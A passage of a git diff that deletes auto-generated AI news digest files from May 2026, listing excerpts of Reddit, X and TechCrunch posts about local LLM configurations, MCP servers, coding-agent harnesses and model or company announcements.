Face](https://reddit.com/r/LocalLLaMA/comments/1tfin40/jackrongqwopus359bcodergguf_hugging_face/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> >**Qwopus3.5-9B-coder** is specially optimized and fine-tuned for high-performance **🤖 Agentic Coding, complex Tool Calling, and logical reasoning.** >*💡* ***Why the 9B Dense Model?*** *We believe that the 9B dense architecture represents the perfect* ***"sweet spot"*** *for large language models. It runs seamlessly at 8-bit precision on entry-level 16GB RAM devices—such as standard laptops and the Mac mini—making it exceptionally lightweight yet highly versatile. Without requiring expensive hardware, it allows you to achieve excellent performance paired with impressive inference speeds. Simply put,* ***Qwen3.5-9B is currently the best open-source model in its class.*** # 🛠 Training Strategy The fine-tuning process of this model deeply integrates **Trace Inversion** data augmentation technology with high-quality **Agent Traces**. This systematic approach not only strengthens the model's ability to solve complex programming tasks, but also greatly improves its logical coherence and accuracy when using various tools. This model is designed specifically for the following goals: * 🧩 More structured and stronger logical reasoning capabilities, reducing repetitive thinking * �… - ---- - -## [2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:](https://x.com/OliverB72157882/status/2055972796711502049) -*X search / AI model updates* | 17/05/2026 | Score: 0.98 -Tags: api_update, tool_update - -> 2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes: - ---- - -## [I ran 100 Claude + Codex sessions in parallel to understand what I'm doing wrong in marketing my open source "Claude Command Center". Here's the playbook they came up with.](https://reddit.com/r/ClaudeAI/comments/1tfbxmf/i_ran_100_claude_codex_sessions_in_parallel_to/) -*Reddit r/ClaudeAI* | 17/05/2026 | Score: 0.94 -Tags: open_source, tool_update - -> A week ago I launched my open-source project (Claude Control Center) on this subreddit. Got 0 upvotes. Dead in 5 hours. :) \[The app is awesome - great way to manage multiple sessions and avoid waiting on top of Claude + Codex - try it :) [git:amirfish1/ccc](http://github.com/amirfish1/claude-command-center) . So I spawned **100 Claude + Codex agents** in parallel and asked them to figure out what I did wrong (It had two hours left on my weekly Claude limit and 20% left - tried to think of good use :) ) . 30 minutes and 100 artifacts later, they handed me back a playbook. https://reddit.com/link/1tfbxmf/video/0mi1ytksol1h1/player The headline finding: stars don't come from better code. They come from: marketing surface. Tagline, demo GIF, founder credential, hosted landing page, multi-shot Hacker News, awesome-list inclusion. The system found that gap on its own - I never told it to study marketing. 5-min video walking through the 7 findings + what the agents drafted (Show HN body, X thread, LinkedIn post, channel plan): [https://youtu.be/Tm2svTe\_Ed4](https://youtu.be/Tm2svTe_Ed4) The video itself - is \*ON PURPOSE\* 100% built by the AI who created the agents \[happy to share th… - ---- - -## [Claude Code context-window: /clear after EVERY task in the codebase or are there edge cases?](https://reddit.com/r/ClaudeAI/comments/1tfnqmc/claude_code_contextwindow_clear_after_every_task/) -*Reddit r/ClaudeAI* | 17/05/2026 | Score: 0.54 -Tags: api_update, cli_tool - -> So I have been recently coding a bunch with the following setup: I am launching Claude Code CLI inside of my repo (a complete shopify theme; if you are unfamiliar it is 3-8mb of source code, structurally something like this: `layout/ 2–3 files (theme.liquid = root shell)` `templates/ 15–25 files (one per page type, JSON or liquid)` `sections/ 30–50 files (reusable page blocks)` `snippets/ 20–40 files (sub-components, like partials)` `assets/ 30–60 files (css, js, svgs)` `locales/ 5–10 files (i18n JSON)` `config/ 2 files (settings_schema.json = theme editor config)` ) I also have an app set up that shows, what the current usage of the models context windows is currently at in %. **Recently I have been wondering: say I give claude quite a heavy task that involves the typical stack of 3 files (1 .js, 1 .liquid and 1 .css) and this instantly bumps up the context window from 0% to 10%, is there a golden rule that one should always do /clear after such an extensive task or does it depend if say, the next task depends on the same 3 files?** Do you guys have any advice on when the perfect time is to /clear? What are your experiences with this? Do you know of any addons that could facilita… - ---- - -## [LLM's on Android (Snapdragon 8 Elite) MOE Experience](https://reddit.com/r/LocalLLaMA/comments/1tg3ssd/llms_on_android_snapdragon_8_elite_moe_experience/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: developer_tool - -> So I bought a phone with Snapdragon 8 elite (gen 4) and 24GB ram (Honor magic 7 pro). My experience has been mixed but with solid potential. Hexagon (Snapdragon 8 Elite) NPU and OpenclGPU support and updates have been rolling in fast but still the fastest prompt processing and token generation have mostly been CPU (I would bet that soon enough either NPU or GPU will be faster or more realistically both). CPU has the downside of generating more heat than NPU and GPU inference but overall it's still the fastest **currently**. Now there are no phones with 32gb ram without a virtual ram extension which doesn't work with LLM's ofc, so the best you will do is 24gb ram. What can you do with 24gb ram and a smartphone processor though? Quite a lot actually, MOE has been getting quite popular and their Q4 quants of these models are great and fit into the 24GB. My personal recommendation is IQ4\_XS and MXFP4\_MOE since with what I have tested MXFP4\_MOE is quite faster but for the size IQ4\_XS can't be beaten. Q4\_0 is more optimised but quality wise it's worse than both (subjectively from my own experience). Goes without saying but Q4\_K\_M is also quite reliable from a speed/quality/size s… - ---- - -## [While waiting for Fara-1.5 for my coding harness](https://reddit.com/r/LocalLLaMA/comments/1tg3kbz/while_waiting_for_fara15_for_my_coding_harness/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: agent_tool - -> Hi all, Not sure many people are aware so wanted to give a word about [Fara-1.5 release](https://www.microsoft.com/en-us/research/video/magenticlite-a-full-stack-agentic-experience-powered-by-small-models/). => this release will likely be the big sister of [Fara-7B](https://huggingface.co/bartowski/microsoft_Fara-7B-GGUF) and built on top of Qwen3.5 Actual Fara-7B performs not bad at all but actually requires a proper implementation, and I really hope the 1.5 will be SOTA, in different (including smaller) versions, and may simplify all the pipeline! I gave my coding agent harness extra built-in features: * browser automation tool allowing navigation either via accessibility tree only (CDP / DOM) or via vision + grounding (the above video uses Qwen3.6 35B + Fara-7B) * the possibility to generate prefilled "skills" directly from conversation history + Jobs to schedule auto-run * recording from user actions (requires vllm for video and maybe llama.cpp following [this PR](https://github.com/ggml-org/llama.cpp/pull/21858)?) Feel free to have a look at the project, it is focused on controllability and low context footprint: [https://github.com/leflakk/openclose](https://github.com/le… - ---- - -## [Pushing the limit: minimax m2.7 q8_0 128k on 2x3090, 256GB DDR4](https://reddit.com/r/LocalLLaMA/comments/1tg37t6/pushing_the_limit_minimax_m27_q8_0_128k_on_2x3090/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: agent_tool - -> CPU is just a secondhand 10900x. Using 128k context, unquantized kv cache. Model is at q8\_0 to mitigate some weird behavior I was seeing at lower quants. Speed is very slow at around 50tps pp, 10tps tg, but usable for coding agent workflows. Anybody else running MoE models in this size class on relatively low-end hardware? For my purposes, speed is less important than accuracy, as long as it's not like literally all day. Any other models you'd recommend I'd try or additional optimization tips that could help within my constraints? I wish they'd released the draft model for MTP on this model but it looks like they declined to do so for 2.7. My ik\_llama flags -- sorry for the funny formatting, this is pasted out of my vibe coded NixOS config: "${ik-llama-cuda}/bin/llama-server" + " -m ${modelPath}" + " --host 0.0.0.0" + " --port ${toString cfg.port}" + " -c ${toString cfg.contextLength}" + " -ngl 999" + " --cpu-moe" + " -sm graph" + " -fa on" + " -t 16" + " -tb 16" + " -b 4096" + " -ub 4096" + " -np 1" + " -muge" + " -ger" + " --jinja" + " --metrics" + " --temp 1.0" + " --top-p 0.95" + " --top-k 40" + " --min-p 0.01" - ---- - diff --git a/data/digest-2026-05-18.md b/data/digest-2026-05-18.md deleted file mode 100644 index cdc188c..0000000 --- a/data/digest-2026-05-18.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-18** | 15 stories | Auto-generated from 665 archived stories - ---- - -## [obsidian-mcp-server: v3.2.0 Released](https://reddit.com/r/ClaudeAI/comments/1tg692a/obsidianmcpserver_v320_released/) -*Reddit r/ClaudeAI* | 18/05/2026 | Score: 1.00 -Tags: api_update, mcp, product_launch, developer_tool - -> [obsidian-mcp-server](https://github.com/cyanheads/obsidian-mcp-server) [3.2.0](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.2.0) adds an `omnisearch` mode to `obsidian_search_notes` (BM25-ranked, typo-tolerant, PDF + OCR via the [Omnisearch](https://github.com/scambier/obsidian-omnisearch) and [Text Extractor](https://github.com/scambier/obsidian-text-extractor) plugins), MCP-spec cursor pagination across all search modes, and a `nameRegex` filter on `obsidian_list_commands`. Recent Releases: [v3.1.11](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.11) brought the same `nameRegex` filter to `obsidian_list_tags`, and [v3.1.10](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.10) added server-level instructions on the MCP `initialize` response. Note: The HTTP endpoint in Omnisearch is disabled by default. You must enable it in the Omnisearch plugin settings. Let me know if you have any questions/issues! - ---- - -## [Witchcraft, fast local semantic search on top of SQLite [P]](https://reddit.com/r/MachineLearning/comments/1tgqyo8/witchcraft_fast_local_semantic_search_on_top_of/) -*Reddit r/MachineLearning* | 18/05/2026 | Score: 1.00 -Tags: api_update, open_source, cli_tool - -> **Witchcraft (https://github.com/dropbox/witchcraft)**, an open source project that I built at Dropbox, is a from-scratch re-implementation of Stanford's XTR-Warp semantic search engine ( [https://github.com/jlscheerer/xtr-warp](https://github.com/jlscheerer/xtr-warp) ) in safe rust, using a single-file SQLite database as backing storage, making it suitable for client-side deployment. It runs completely stand-alone on your device, needs no API keys, no vector database, no chunking strategy, no fancy re-rankers, and it is lightning fast (20ms p.95 end-to-end search latency on NFCorpus, at 33% NDCG@10, on an Apple Macbook Pro M2 Max, more than twice as fast as the original XTR-WARP on server-class hardware, at similar accuracy.) The project also includes **Pickbrain**, a CLI that indexes your Claude Code and OpenAI Codex session transcripts, memory files, and authored documents into a Witchcraft database for fast semantic search. Ever wondered "what was that conversation where I fixed the auth middleware?" — pickbrain finds it, and lets you resume the session directly. There is also a /pickbrain skill for both Claude and Codex, which equips those tools with global memory across all… - ---- - -## [I built an open-source VS Code extension to visualize and debug Claude Code sessions in real-time](https://reddit.com/r/ClaudeAI/comments/1tgj45v/i_built_an_opensource_vs_code_extension_to/) -*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.86 -Tags: open_source, developer_tool, cli_tool - -> Hey everyone! Running Claude Code in the terminal is amazing, but I hated the "black box" feeling of not knowing exactly what the agent was doing behind the scenes, or when it got stuck in an infinite loop. To solve this, I built \*\*Argus\*\* — an open-source visual debugger and observability tool for Claude Code right inside VS Code. Key features: \* \*\*Real-time Timeline:\*\* Streams the JSONL transcripts instantly to show agent steps (Bash, Read, Write, WebFetch). \* \*\*Dependency Graph:\*\* Visually maps out which files the agent is touching and how they connect. \* \*\*Cost & Loop Detection:\*\* Caught a few duplicate reads and retry loops that were burning tokens unnecessarily. It’s completely open-source (MIT) and lightweight. I’d love to hear your feedback on the architecture or features you'd like to see next! GitHub: [https://github.com/yessGlory17/argus](https://github.com/yessGlory17/argus) - ---- - -## [Lemonade v10.5.1: an MTP + ROCm 7.13 quick start for Strix Halo](https://reddit.com/r/LocalLLaMA/comments/1th0z6k/lemonade_v1051_an_mtp_rocm_713_quick_start_for/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Update to Lemonade v10.5.1, then: ``` # Get the model lemonade pull Qwen3.6-27B-MTP-GGUF # Get ROCm 7.13 lemonade backends install llamacpp:rocm # Load the model (MTP args auto-applied) lemonade load Qwen3.6-27B-MTP-GGUF --llamacpp rocm --ctx-size 0 ``` Shown in the video taking a look in the mirror with the help of Pi agent. Github: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk PS. u/lucifer-vali fixed Fedora 43 support in this release as well :) - ---- - -## [OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the A…](https://x.com/NanoGPTcom/status/2056425379171058008) -*X search / AI model updates* | 18/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the API, set service_tier to "flex" or - ---- - -## [Tried every Hermes Agent alternative so you don't have to (2026 roundup)](https://reddit.com/r/LocalLLaMA/comments/1tgsttq/tried_every_hermes_agent_alternative_so_you_dont/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Been running Hermes since launch. Love it. But a few people on my team can't get past the setup, and honestly the security situation with some of these self-hosted agents has gotten complicated enough that I put together a proper comparison. Eleven alternatives, split into OSS and managed. Quick take on each: **Open Source** **OpenClaw** is the obvious first stop. 347k GitHub stars, 24+ platform integrations, massive skill library. The security track record is genuinely rough though. 9 CVEs in four days in March, \~20% of ClawHub packages flagged as malicious by independent audits. Use it but harden it first. **TrustClaw** is what OpenClaw should have been from a security standpoint. OAuth only, sandboxed execution, 20k+ managed integrations. You give up some control but your credentials actually stay safe. **PicoClaw** is absurd in the best way. Go binary, under 10MB, runs on $10 hardware, boots in under a second. Still pre-1.0 but if you need something lean it's hard to argue with. **ZeroClaw** is the Rust rewrite. 3.4MB binary, sub-10ms startup, minimal dependencies. Not trying to be feature-rich. Just trying to stay running. **nanobot** is \~4000 lines of Python you can actual… - ---- - -## [Configuration Qwen3.6-35b-a3b (12Gb VRAM)](https://reddit.com/r/LocalLLaMA/comments/1tgrk75/configuration_qwen3635ba3b_12gb_vram/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Has anyone here tested different KV cache quantizations and compared their performance? I’m currently using the model in Q5\_K\_M with Q4 KV cache on a 12 GB VRAM GPU. With this setup, I’m offloading about 27 MoE layers to the CPU and getting around 90–100 tok/s with a 128k context window. I’m trying to see if I can push it a bit further, since I’m using it inside my own AI agent. The model is already pretty smart, but in agentic workflows it’s not always as strong or consistent as I’d like. I’d be curious to know what KV quantization settings people are using, and how much difference they noticed in speed, memory usage, and output quality. Also, would you recommend trying a different model quantization than Q5\_K\_M for this setup? For example, would Q4\_K\_M, Q6\_K, or another quant be a better trade-off for speed, VRAM usage, and reasoning quality? - ---- - -## [Qwen 35b a3b surprises me](https://reddit.com/r/LocalLLaMA/comments/1tgqpa8/qwen_35b_a3b_surprises_me/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Just wanted to share that I'm pretty happy about Qwen 35b a3b agentic coding performance. I'm running the model in q80 quant, kv cache both q8\_0 as well, with 262144 in 4090 + 5060 ti, via llama.cpp backend with claude code pointing to localhost. For demo/data analytics purposes, it works pretty well. I haven't used it for large codebases, but it definitely is better than gemma4 26b in my use case. One thing that surprises me is that it seems to get better outcome in agentic coding, than chat. When using it with just chat UI, i found the code qwen35b provide a bit too clunky. I wonder of others have compared its performance against open source harnesses (Pi / opencode). - ---- - -## [xAI Launches Grok Build — Three-Way Coding War Is Now Open](https://x.com/Business_AI/status/2056374805163856261) -*Aligned News (Scoble)* | 18/05/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> xAI has entered the agentic coding market with Grok Build, creating a three-way race with Claude Code and OpenAI Codex for developer workflow ownership. Braygent's take: this matters for everyone building with AI. - ---- - -## [New models when? Forecasting release date.](https://reddit.com/r/LocalLLaMA/comments/1tgh8to/new_models_when_forecasting_release_date/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: product_launch, open_source - -> After the recent releases, there's almost a sense of emptiness. When do you think new models will be released? Looking at the chart, it's between the end of May and the beginning of June, but... I don't know why, it seems like something's changing about "open weights" - ---- - -## [Cutoff dates of open source models](https://reddit.com/r/LocalLLaMA/comments/1tg9rcp/cutoff_dates_of_open_source_models/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: mcp, open_source - -> I was trying Qwen 3.6-27b and Gemma4 in a siomple web chat. Asked them both a qn like 'recommend the best llm for a 5060ti' and was suprised when they both replied 'user is asking about a card that doesn't exist'. I then saw their knowledge cutoff was early 2025, hence why. But tech advances so fast, in that 1yr+ there have been tons of changes in languages, frameworks, best practices and tech, not to mention AI. of course the model could use MCP etc to do a web search, but its pretraining is still using 1yr+ older knowledge. Found that suprisising and probably explains a few things, but its not something widely known I think - ---- - -## [Follow-up: adding Ollama support to my open-source cursor-aware AI app - looking for beta testers with vision-capable local models](https://reddit.com/r/LocalLLaMA/comments/1tg4ux6/followup_adding_ollama_support_to_my_opensource/) -*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> EDIT 2: Trick-Assignment-828 pointed me at the actual rule update from the mods - Rule 3 Low Effort was expanded to cover LLM-assisted posts without disclosure. Disclosing now: Disclosure: I'm a non-native English speaker (German). This post was drafted by me with AI used for a grammar pass. Structure, technical content, the ask, the Skales reference, and all decisions are mine. Wasn't aware of the rule update until called out in comments. Apologies for missing it. If mods feel this still violates Rule 3 even with disclosure, happy for it to come down. Otherwise leaving up so the technical thread can continue. \--- EDIT: Updated model list based on this thread's feedback... \[Original post body\] Edit: Updated model list based on this thread's feedback — Qwen3.5/3.6 family and Qwen3.6-35B-A3B are the current recommendations, not the older Qwen2.5-VL / Llama 3.2 Vision references that were carried over from my older post. Thanks jacky2060, ilintar, and others for the corrections. \--- Follow-up to my [latest post](https://www.reddit.com/r/LocalLLaMA/comments/1tcl96f/looking_for_fast_visioncapable_local_models_that/) asking about fast vision-capable local models with reliable tool c… - ---- - -## [memv ships an MCP server — OSS memory layer for agents, now usable from any MCP client](https://reddit.com/r/ClaudeAI/comments/1tg6jjq/memv_ships_an_mcp_server_oss_memory_layer_for/) -*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.94 -Tags: mcp, tool_update - -> memv (OSS, Python) gained an MCP server today. If you're building on Claude Desktop / Code / Cursor — or your own MCP host — you get persistent, structured memory without writing integration code. ```bash pip install "memvee[mcp]" memv-mcp --db-url memory.db --llm-model openai:gpt-4o-mini ``` Or mount it inside your own process: ```python from memv.mcp.server import create_server server = create_server( db_url="memory.db", default_user_id="alice", embedding_client=my_embedder, llm_client=my_llm, ) server.run(transport="streamable-http") ``` **Surface:** - 5 MCP tools: `search_memory`, `add_memory`, `add_conversation`, `list_memories`, `delete_memory` - LLM optional — retrieval/add work LLM-free; only `add_conversation` extraction needs one - Per-user isolation at every tool boundary, including `delete_memory` ownership check - Concurrent extractions for the same user coalesce onto one task For context if you haven't seen memv before: predict-calibrate extraction (Nemori-inspired) so we don't store everything, bi-temporal model so contradictions expire instead of overwriting, hybrid retrieval (vector + BM25 + RRF). Docs: https://vstorm-co.github.io/memv/advanced/mcp-server/ GitHub:… - ---- - -## [Every Markdown File You Write for AI is Already Lying to It](https://reddit.com/r/ClaudeAI/comments/1tgilrn/every_markdown_file_you_write_for_ai_is_already/) -*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.70 -Tags: api_update, developer_tool - -> CLAUDE.md files. System prompts. README files with setup instructions. Architecture docs. API references. Runbooks. Onboarding guides. If you've written a markdown file meant for an AI to read, it almost certainly contains values that were true when you wrote them and are no longer true now. The port your dev server runs on. The current version of the package. Which env vars are actually set. How many tests exist. Whether a service is running. These things change constantly, and markdown doesn't know it. So developers do what honest writers do - they add caveats. "Check package.json if this is stale." "Verify before running." "New packages may have been added since this was written." The intent is good. The effect is a list of things the AI has to go verify before it can do anything you actually asked for. We counted them in a real CLAUDE.md. There were seven. And CLAUDE.md is just one file type - the same problem exists everywhere AI reads markdown today. # The Pre-Flight Tax Here's a representative CLAUDE.md. Nothing here is invented - these are patterns from real production repos: # CLAUDE.md > Before starting any session: Read ~/projects/api-core/SYNC.md first and check for… - ---- - -## [Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automat…](https://x.com/Shruti_0810/status/2056266132592468126) -*X / @shruti_0810* | 18/05/2026 | Score: 0.70 -Tags: mcp, developer_tool - -> Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automatically recommends: → MCP servers → - ---- - diff --git a/data/digest-2026-05-19.md b/data/digest-2026-05-19.md deleted file mode 100644 index ac18857..0000000 --- a/data/digest-2026-05-19.md +++ /dev/null @@ -1,117 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-19** | 15 stories | Auto-generated from 634 archived stories - ---- - -## [Google launches Antigravity 2.0 with an updated desktop app and CLI tool](https://techcrunch.com/2026/05/19/google-launches-antigravity-2-0-with-an-updated-desktop-app-and-cli-tool/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch, cli_tool, tool_update - ---- - -## [Google releases Gemini 3.5 Flash for complex agentic workflows, coding, and reasoning at 289 tokens per second and higher scores than Gemini 3.1 Pro on Terminal-Bench 2.1, GDPval-AA, and MCP Atlas — Large token quotas appeared in Google Cloud Console before wider rollout.](https://www.digg.com/ai/9p5cqkyn?rank=2) -*Digg AI* | Score: 1.00 -Tags: mcp, product_launch, cli_tool - ---- - -## [Anthropic just bought the company that generates most production MCP servers](https://reddit.com/r/ClaudeAI/comments/1thkkrb/anthropic_just_bought_the_company_that_generates/) -*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool - -> Anthropic acquired Stainless on Monday for a reported $300M+. Most coverage is framing this as a developer tools acquisition. Stainless is best known for generating the official Python and Node SDKs that ship with OpenAI, Google, Meta, Cloudflare, and Anthropic. The SDK story is real. The MCP side is the part that matters here. Stainless was one of the first vendors to extend their compiler to produce MCP servers from the same OpenAPI specs that produce their SDKs. MCP hit \~97M monthly SDK downloads by December 2025 and around 10,000 production servers by early 2026. A lot of that production code was Stainless-generated. Anthropic now owns the dominant MCP server generator. What actually changed hands on Monday: 1. The engineering team. Roughly 40-50 people including founder Alex Rattray, who previously built Stripe's patented SDK generation system. Now reporting to Katelyn Lesse in Anthropic's Platform Engineering org. 2. The technology. The generator, the templates, the language-specific runtimes, the OpenAPI extensions Stainless invented for SDK-specific edge cases. 3. The hosted product is winding down. New signups stopped Monday. New SDK and MCP server generations stopped Mo… - ---- - -## [favorite Agentic Coding Harness](https://reddit.com/r/LocalLLaMA/comments/1th5t1b/favorite_agentic_coding_harness/) -*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 -Tags: developer_tool, cli_tool, agent_tool - -> So far, I’ve tried Codex CLI, Claude Code, Gemini CLI, OpenCode, and recently, Pi with local models. Pi is the leanest of them all, with just four tools: read, write, edit, and bash. Its system prompt is only under 2K tokens, and it's perfect for local models. I've been trying out Qwen 27B-MXFP8 with it, and it's much better than I expected! It doesn't have fancy bells and whistles like multi agents, but the only thing I’m missing is searching the web for documentation. I’m sure you can get it through an extension, but you probably won’t get the same robust search features you get from commercial platforms anyways. This might be my new favorite! What’s yours? - ---- - -## [Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advan…](https://x.com/AlternativeTo/status/2056637498978398395) -*X / @alternativeto* | 19/05/2026 | Score: 0.86 -Tags: mcp, cli_tool, tool_update - -> Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advanced users. https:// alternativeto.net/news/2026/5/tr ipsy-adds-mcp-integration-and-cli-support-for-ai-powered-travel-planning-and-organization/ … - ---- - -## [Google introduces Gemini Spark, a 24/7 agentic assistant with Gmail integration](https://techcrunch.com/2026/05/19/google-introduces-gemini-spark-a-24-7-agentic-assistant-with-gmail-integration/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch, tool_update - ---- - -## [Edison Scientific announces partnership with Incyte to deploy Kosmos AI agent across full drug development pipeline from molecular design through FDA approval — Incyte becomes first company to integrate the system end-to-end.](https://www.digg.com/ai/r5p7scr1?rank=3) -*Digg AI* | Score: 1.00 -Tags: product_launch, agent_tool - ---- - -## [Why is LM-Studio download page showing me 0.4.7 to download when the latest version is 0.4.13?](https://reddit.com/r/LocalLLaMA/comments/1thx8eo/why_is_lmstudio_download_page_showing_me_047_to/) -*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 -Tags: github_release, tool_update - -> I'm currently running LM-Studio 0.4.12. In the app if I check for updates it says there's a new version (0.4.13), I can read the changelog for 0.4.13, but when I go to [https://lmstudio.ai/download](https://lmstudio.ai/download) it shows 0.4.7. What's going on here? Anyone knows? - ---- - -## [OpenAI cofounder Andrej karpathy just joined anthropic and the talent war is officially over](https://reddit.com/r/ClaudeAI/comments/1thw3bu/openai_cofounder_andrej_karpathy_just_joined/) -*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> this happened literally today ,andrej karpathy one of the most respected ai researchers alive nd the guy whose youtube lectures taught half the developers in this sub how neural networks work, just announced he is joining anthropic's pre training team. He's the 3rd senior openai figure to defect to anthropic in under two years. Jan leike left in may 2024, John schulman (co-founder) left in august 2024 and now karpathy. He is joining the pre training team under nick josef and building a new team focused on using claude to accelerate pre training research which means Anthropic is betting that claude can help make itself smarter, thats recursive self improvement with one of the most capable researchers in the world leading it. The musk trial verdict came in yesterday with the jury ruling in altman's favor, karpathy announces today voilaa . The timing is either coincidental or the most savage talent acquisition move in tech history. I hv been watching this trajectory while building my own workflows on claude ,every month the ecosystem around claude gets stronger. The connectors mean claude orchestrates professional creative tools natively, the api means platforms like magic hour and k… - ---- - -## [Floor for local meeting summarization on a 6GB GPU: qwen3.5:0.8b works at 57s, Granite 4 350M hallucinates](https://reddit.com/r/LocalLLaMA/comments/1thsset/floor_for_local_meeting_summarization_on_a_6gb/) -*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> Disclosure: I made this. Open-source, MIT, Windows + Linux. Not affiliated with [voiceflow.com](http://voiceflow.com) (the chatbot SaaS, name collision, sorry). Why this exists: I wanted local-only dictation and meeting transcription, because audio shouldn't have to leave the machine just to become text. I had a 6GB GPU sitting there doing nothing most of the day. So I built it: hold a hotkey, faster-whisper transcribes locally, text pastes at the cursor. v1.6.0 shipped today and adds the meetings recorder: mic + system audio into one stereo file, transcribed locally, summary goes through whatever endpoint you point it at (Ollama, llama.cpp, Groq, OpenAI). The only network call in the whole product is the optional summary, and you pick where it goes. The on-topic part for this sub: mini models on real workloads. v1.6.0 was the excuse to actually benchmark this on real meeting transcripts instead of toy prompts. I tried the latest small Qwen first, qwen3.5:0.8b (873M, Q8\_0). Test rig: RTX 3060 Laptop 6GB, \~4.3GB free after Whisper loads, Ollama 0.23, Arch. Input: a real 4-minute meeting, \~2900 chars. It works, with one caveat. Ollama's VRAM-aware default num\_ctx on this GPU is… - ---- - -## [bytedance released an open source model that attempts to do just about anything with only 3b parameters](https://reddit.com/r/LocalLLaMA/comments/1thkwgk/bytedance_released_an_open_source_model_that/) -*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Lance is a lightweight native unified multimodal model that supports **image and video understanding, generation, and editing** within a single framework. * **Efficient at 3B scale.** With only **3B active parameters**, Lance delivers strong performance across image generation, image editing, and video generation benchmarks. * **Trained from scratch.** Lance is built with a staged multi-task recipe and trained entirely from scratch within a **128-A100-GPU** budget. - ---- - -## [How I built a 9-agent team where my agents actually talk to each other](https://reddit.com/r/ClaudeAI/comments/1thi16y/how_i_built_a_9agent_team_where_my_agents/) -*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> I've been running Claude Code for 6 months, shipping my product and running content/launch ops for it. The thing that kept breaking wasn't the agents themselves. It was me. Every handoff between research and write and code and review was me copy pasting context between sessions. I was the dispatcher and context holder for my own AI team Tried gstack first. The roles are great but I'm still the one cycling through slash commands. /office-hours → /plan-eng-review → /review → /ship. Good output, but I'm orchestrating every step Spent a weekend porting my workflow over. Here's the lineup: **Engineering (4 agents)** * arch: owns architectural decisions. Reviews proposed changes before code starts. Soul: "senior staff engineer, asks 'what breaks at 10x' before approving anything * backend: owns /api, /services. Implements after arch greenlights * frontend: owns /web. Picks up from backend when API contracts are stable * review: reads every PR before I do. Catches the lazy stuff so I only review substantive changes **Growth/Content (5 agents)** * research: uses ahrefs MCP to analyse keywords/opportunities/market and hands off to strategist * strategist: reads research, writes campaign br… - ---- - -## [We have sub-agents at home](https://reddit.com/r/LocalLLaMA/comments/1th8a43/we_have_subagents_at_home/) -*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> At work I get unfettered access to gpt 5.4 and sonnet, so I'm quite used to spawning sub-agents to go crazy on a repo and split up tasks. At home I am VRAM poor and like to run the models locally for my own enjoyment. Almost every single sub-agent extension/implementation does not account for any of the restrictions imposed by having 10gb of VRAM and a single slot for a KV cache (thats already quantized). I already work as a developer, so I qwen3.6-35b-a3b tagged teamed a partially vibe-coded fork of an existing sub-agent repository for pi coding agent. This is really only relevant if you: * Use pi coding agent as your harness * Can only run a single LLM at a time with 1 slot via llama.cpp server * Want to use sub-agents without fully reprocessing your prompts after the sub-agent is done Repo is [here](https://github.com/BenjaminBilbro/pi-subagent), feel free to use it or fork it idc. I am also interested in how others around here have dealt with sub-agents on a purely local and VRAM constrained setup. I was also planning to add the ability for sub-agents to be spawned with no previous context, and manage the saving and storing the main context via \`--slot-save-path\` and the \`s… - ---- - -## [Glia – Local-first shared memory layer (SQLite-vec + FTS5 + Offline Knowledge 